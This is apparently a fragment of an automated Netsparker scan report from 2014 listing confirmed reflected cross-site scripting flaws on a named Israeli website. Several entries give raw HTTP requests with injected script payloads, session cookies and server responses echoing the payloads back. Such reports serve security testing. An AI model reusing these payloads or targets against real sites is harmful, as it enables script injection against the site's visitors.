    RequestGET /vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00015D)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    Response';}

    netsparker(0x00015D)_fix.mp4" type="video/mp4">-->

    Your browser does not support the video tag.

  • 3.65. /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%..

    ParametersParameter Type Value

    URI-BASED Full URL '"-->alert(0x0004E2)

    RequestGET /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E2)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:44 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 170Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/page/odot/'"-->netsparker(0x0004E2)script>style>netsparker(0x000534) HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:12 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 174Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/about/search/?'"-->netsparker(0x000534)script>style>

  • RequestGET /reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D5)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:48:03 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 182Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/reg/maillingUpdate.asp'"-->netsparker(0x0001D5)script>style>

  • ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 175Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/contact/search/'"-->netsparker(0x0004A9)script>style>netsparker(0x000234)script>style>

  • 3.72. /maillingUpdate.asp CONFIRMEDhttp://www.shalomlaam.co.il/maillingUpdate.asp?'"-->alert(0x000218)

    ParametersParameter Type Value

    Query Based Query String '"-->alert(0x000218)

    RequestGET /maillingUpdate.asp?'"-->netsparker(0x000218) HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:48:36 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 179Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/maillingUpdate.asp?'"-->netsparker(0x000218)script>style>

  • RequestGET /home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:15 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/home/'"-->netsparker(0x00010D)script>style>

  • ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:59:54 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 184Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/site/bmidrash/answer.asp'"-->netsparker(0x00037E)script>style>netsparker(0x0001AF)script>style>

  • 3.79. /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015..

    ParametersParameter Type Value

    URI-BASED Full URL '"-->alert(0x000156)

    RequestGET /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:52 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 173Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/alon/list.asp'"-->netsparker(0x000156)script>style>

  • 3.81. /about/reg/ CONFIRMEDhttp://www.shalomlaam.co.il/about/reg/?'"-->alert(0x0004FE)

    ParametersParameter Type Value

    Query Based Query String '"-->alert(0x0004FE)

    RequestGET /about/reg/?'"-->netsparker(0x0004FE) HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:56 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 171Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/about/reg/?'"-->netsparker(0x0004FE)script>style>

  • 3.83. /js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea